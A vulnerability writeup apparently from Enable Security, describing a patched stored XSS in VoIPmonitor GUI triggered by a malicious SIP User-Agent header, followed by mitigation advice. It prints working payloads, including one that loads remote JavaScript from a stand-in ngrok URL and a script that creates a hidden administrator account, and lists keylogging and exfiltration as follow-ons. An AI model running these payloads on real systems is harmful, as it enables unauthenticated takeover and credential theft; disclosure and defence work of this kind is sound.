Abusing SIP for Cross-Site Scripting? Most definitely!

Last updated on Jun 10, 2021

Executive summary (TL;DR)

SIP can be used as an attack vector for AppSec vulnerabilities such as cross-site scripting (XSS), potentially leading to unauthenticated remote compromise of critical systems. VoIPmonitor GUI had one such vulnerability which highlights this attack vector exceptionally well. The following writeup explores how persistent backdoor administrative access can be obtained by sending malicious SIP messages. This vulnerability was reported by Enable Security and fixed in VoIPmonitor GUI back in February 2021, using standard cross-site scripting protection mechanisms.


Cross-site scripting (XSS) is an established and well understood application security vulnerability. Even so, the nature of the vulnerability makes it difficult to mitigate at times, often resulting in either partial remediation (i.e. still vulnerable to other payloads) or inputs that are left outright vulnerable. When the team at Enable Security performs an offensive security audit against a cloud-based provider for the very first time, one of the initial tests involves looking for cross-site scripting vulnerabilities, even if the focus of the audit is the voice over IP applications or infrastructure!

Before diving into the technical underpinnings of this exploit, let us start with a common customer use-case first. A customer may want to be privy to the end-user SIP device types (e.g. mobile, desktop) that are connecting to their application or server. A vendor may provide that information by rendering SIP network traffic within the application’s web interface, even though that traffic should really be treated as user input. Pair these two factors together and we potentially have the ability to send unauthenticated traffic carrying a malicious payload to a server. If that payload is then rendered as HTML in the UI, it runs arbitrary code within the user’s browser, which is XSS.

The attack

Let us shift focus towards VoIPmonitor GUI — a commercial frontend to VoIPmonitor, the open source network packet sniffer (SIP, RTP, RTCP, SKINNY(SCCP), MGCP, WebRTC). Part of the UI allows us to monitor any SIP REGISTER requests, including those that failed and with that, includes the type of user device that sent the SIP REGISTER message via the User-Agent header value (🤔).

VoIPmonitor GUI SIP REGISTER view showing user-agent strings

Let’s play around with the SIP REGISTER message and see if we can get the UI to run some arbitrary JavaScript. Our malicious message will set the User-Agent to <img src=x onerror=alert(1)> and if this gets rendered in the DOM, the browser will fail to fetch an image under /x (which hopefully does not exist) and on failure, executes the malicious code. Here is what the message will look like.

REGISTER sip: SIP/2.0\r\n
Via: SIP/2.0/UDP;rport;branch=z9hG4bK-X\r\n
Max-Forwards: 70\r\n
From: <sip:002@>;tag=ZB1fPjdIHA6RmaNw\r\n
To: <sip:002@>\r\n
Call-ID: C15AfnWADaCSBH4O\r\n
CSeq: 1 REGISTER\r\n
Contact: <sip:002@;transport=udp>\r\n
User-Agent: <img src=x onerror=alert(1)>\r\n
Content-Type: text/plain\r\n
Content-Length: 0\r\n\r\n

Notice the value we are setting for the User-Agent header. By tweaking an open source SIP attack script, we are able to send a couple of malicious packets to a test environment to see if the payload executes as expected.
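For readers who want to reproduce the message in their own lab, here is a minimal sketch of how such a REGISTER could be assembled as a string. The helper name buildRegister, its parameters and the 192.0.2.x documentation addresses are assumptions made for illustration; they are not taken from the script used in the original test.

```javascript
// Hypothetical helper: assembles a SIP REGISTER request as a string.
// targetHost and localAddr are placeholders supplied by the caller.
function buildRegister({ targetHost, localAddr, user, userAgent }) {
  const lines = [
    `REGISTER sip:${targetHost} SIP/2.0`,
    `Via: SIP/2.0/UDP ${localAddr};rport;branch=z9hG4bK-X`,
    'Max-Forwards: 70',
    `From: <sip:${user}@${targetHost}>;tag=ZB1fPjdIHA6RmaNw`,
    `To: <sip:${user}@${targetHost}>`,
    'Call-ID: C15AfnWADaCSBH4O',
    'CSeq: 1 REGISTER',
    `Contact: <sip:${user}@${localAddr};transport=udp>`,
    `User-Agent: ${userAgent}`, // attacker-controlled header value
    'Content-Type: text/plain',
    'Content-Length: 0',
  ];
  // Header lines end with CRLF; an empty line terminates the header block.
  return lines.join('\r\n') + '\r\n\r\n';
}

// Example with documentation-only addresses (assumed values).
const exampleRegister = buildRegister({
  targetHost: '192.0.2.10',
  localAddr: '192.0.2.20:5060',
  user: '002',
  userAgent: '<img src=x onerror=alert(1)>',
});
```

The resulting string can then be sent over UDP with whatever SIP tooling you already use in a test environment you are authorised to assess.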

Alert JavaScript function called via XSS in VoIPmonitor GUI

Et voilà! We have ourselves an entry point. At face value this might not seem like much, and in the real world I’d use something less obvious, relying on some canary token or callback. However, keep in mind that this code is executed in an administrator’s browser and is stored there for a period of time (hint: temporary implicit elevation of privileges). This is where the creativity and fun starts; having ourselves an attack vector that executes arbitrary code as an administrator means we can expand the impact of this vulnerability.

As a starting point, let’s turn our temporary implicit elevation of privileges into a permanent and explicit one by creating a covert administrative user. First, let’s see what HTTP request is sent when we create a user.

HTTP request used by VoIPmonitor GUI to create users shown in devtools

A call is made to sql.php (which in itself is interesting for other reasons) with an elaborate JSON payload. We can recreate this POST (HTTP) request with the following JavaScript snippet.

// Credentials for the covert account
var username='h3x0r';
var password='h3x0r-l33t-passwd';

// Replay the user-creation request. This assumes jQuery ($) is already
// loaded by the page and that the administrator's session is active.
$.post('php/model/sql.php', {
    task: 'CREATE',
    module: 'user_admin',
    taskParams: JSON.stringify({
        "keyField": "id",
        "data": {
          "username": username,
          "name": username,
          "password": password,
          "delete2fa_sec": 0,
          "missing_sec": "not defined",
          "req_2fa": false,
          "email": "",
          "is_admin": true
        }
    }),
    // Flat form fields sent alongside taskParams
    username: username,
    name: username,
    password: password,
    delete2fa_sec: '0',
    email: '',
    is_admin: 'on',
    can_audit: '0',
    note: '',
    blocked_reason: '',
    max_bad_login_attempt: '',
    password_expiration_days: '',
    enable_login_ip: '',
    ip: '',
    number: '',
    domain: '',
    vlan: ''
});

We now need to tweak our payload so that it runs this JavaScript in the administrator’s browser and, when fired, creates our covert admin user. We can achieve this by saving the script in a file (e.g. x.js), serving it locally through a simple HTTP server (python -m http.server 8080) and exposing that server to the internet via ngrok (ngrok http 8080). This is a quick and neat way to make local files reachable from the internet over HTTPS, and it comes in handy for various other techniques. The last piece of the puzzle is to adjust the User-Agent header in our SIP REGISTER request so that it fetches and executes our remote JavaScript file instead of popping up an alert.

REGISTER sip: SIP/2.0\r\n
Via: SIP/2.0/UDP;rport;branch=z9hG4bK-X\r\n
Max-Forwards: 70\r\n
From: <sip:002@>;tag=ZB1fPjdIHA6RmaNw\r\n
To: <sip:002@>\r\n
Call-ID: C15AfnWADaCSBH4O\r\n
CSeq: 1 REGISTER\r\n
Contact: <sip:002@;transport=udp>\r\n
User-Agent: <img src=x onerror="var d=document,s=d.createElement`script`;s.src='$MY_NGROK_URL/x.js',d.querySelector`p`.appendChild(s)">\r\n
Content-Type: text/plain\r\n
Content-Length: 0\r\n\r\n

Now on execution, the browser will attempt to fetch an image under /x which will fail and subsequently create a <script> tag pointing to our malicious file to be executed. In the browser we should see three requests in order.

  1. Request to /x which returns a 404 (browser treats 4XX and 5XX responses as errors);
  2. Which triggers the onerror event handler to create a <script> tag to fetch our remote script (i.e. https://$some_ngrok_url/x.js);
  3. Finally sending a POST request to sql.php to create our h3x0r admin user.
Stored XSS loading malicious JavaScript in VoIPmonitor GUI

Looks like the requests are executed in order; if we head over to our Users tab, we see our malicious admin!

Backdoor administrator created using XSS in VoIPmonitor GUI

Feeling like hackerman

Yes, I know the GIF is overused. More importantly, this means we have now turned our temporary privilege escalation into permanent administrator access (all through a single unauthenticated SIP message). There are a couple of additional things we can do from here. We won’t go into detail but they will help illustrate the destructive impact this can have.

  • We can exfiltrate sensitive traffic passing through legitimate VoIP clients. This is particularly useful in real world scenarios where VoIPmonitor GUI would be running internally, allowing us to exfiltrate data through an out-of-band DNS server (one of many methods);
  • Similar to how we created an admin user, we can also delete legitimate administrators, locking them out of the interface;
  • We can embed keyloggers as a backdoor on the login screen, harvesting admin credentials;
  • We can include a fully fledged framework such as BeEF which may be especially useful for exploiting internal web applications.

Possible attack vectors are not limited to the above; any action that the application allows can be exploited using this technique. For example, if the application allows us to send crafted packets to a particular client or invoke some system scripts (perhaps upload arbitrary ones too), then those are all areas that can be exploited to gain persistent privileges or expand our scope through lateral movement.


VoIPmonitor GUI has since released security patches that fix these vulnerabilities and we highly recommend upgrading to the latest version as soon as possible. This issue was reported to the VoIPmonitor developers by the team at Enable Security on the 10th of February 2021 and by the 22nd an updated version could be tested. We confirmed that the code change did address the issue and the release was published on the same date.

If you are an application developer or vendor, then keep in mind that methods to remediate such attacks tend to be case-specific. However, there are a couple of key pointers that can help guide you when evaluating your application’s security posture.

Ensure that user inputs are HTML encoded before they are rendered anywhere in the web interface.

Note: you can generally encode inputs going in (i.e. prior to being stored) or going out (i.e. prior to being rendered), where the latter is often preferred. One important recommendation is that you stick to a single encoding strategy across your application (and even organisation) to avoid double-encode or double-decode scenarios that either break your interface or make you vulnerable to cross-site scripting again.
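As a rough illustration of encoding on output, and of the double-encode pitfall, consider the following sketch. The escapeHtml helper is hypothetical; it is not the fix that VoIPmonitor shipped, and in a real application you would normally rely on the encoding facilities of your framework or templating engine.

```javascript
// Hypothetical output encoder for values placed in HTML element content
// or quoted attribute values.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

const userAgent = '<img src=x onerror=alert(1)>';

// Encoded once, at render time: the browser displays the text and does
// not create an <img> element.
const encodedOnce = escapeHtml(userAgent);
// '&lt;img src=x onerror=alert(1)&gt;'

// Encoded twice (for example on the way in AND on the way out): the
// interface now shows literal "&lt;" entities to the user.
const encodedTwice = escapeHtml(encodedOnce);
// '&amp;lt;img src=x onerror=alert(1)&amp;gt;'
```

Picking a single place to encode (here, at render time) is what keeps the second case from happening.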

If the user input has an expected format, structure and set of accepted values, be sure to validate those first and reject invalid inputs as early as possible.
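To make this a little more concrete, here is a minimal allow-list sketch for a User-Agent value. The function name, the character set and the 128 character limit are all assumptions chosen for illustration; real SIP User-Agent values vary widely, so a rule this strict may reject some legitimate devices and should complement output encoding, not replace it.

```javascript
// Hypothetical allow-list: letters, digits, spaces and a handful of
// punctuation characters commonly seen in product/version strings.
const USER_AGENT_PATTERN = /^[A-Za-z0-9 ._\/()+;:,-]{1,128}$/;

function isPlausibleUserAgent(value) {
  return typeof value === 'string' && USER_AGENT_PATTERN.test(value);
}

// A typical softphone string passes the check.
const acceptsSoftphone = isPlausibleUserAgent('Linphone/3.6.1 (eXosip2/4.1.0)');

// The payload from this writeup contains '<', '=' and '>' and is rejected.
const acceptsPayload = isPlausibleUserAgent('<img src=x onerror=alert(1)>');
```

For a monitoring product, a rejected value might be better replaced with a placeholder or flagged as suspicious than silently dropped, since the malformed header is itself interesting to an operator.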

There is one particular variant that is entirely client-side, referred to as DOM-XSS, where both the input source (e.g. document.cookie) and the execution sink (e.g. eval()) are client-side. For such variants, the escaping and encoding need to occur at the client-side level rather than server-side.
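On the client side, one common approach is to avoid HTML-parsing sinks altogether. The sketch below assumes a hypothetical renderUserAgentCell helper that writes an untrusted value through textContent, which treats it as plain text, in contrast to innerHTML, which would parse it as markup.

```javascript
// Hypothetical helper: writes an untrusted value into a table cell.
function renderUserAgentCell(cell, userAgent) {
  // Safe sink: textContent never interprets the value as HTML.
  cell.textContent = String(userAgent);
  // Unsafe alternative (do not use with untrusted data):
  //   cell.innerHTML = userAgent;
  return cell;
}

// In a browser this would be called with a real element, for example:
//   renderUserAgentCell(document.createElement('td'), untrustedValue);
```

With textContent, the payload from this writeup would simply be displayed as text and no img element would be created.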

There is ample material on how to mitigate cross-site scripting, and the trusty OWASP Cross Site Scripting Prevention Cheat Sheet is an excellent reference for more detailed and well laid out rules.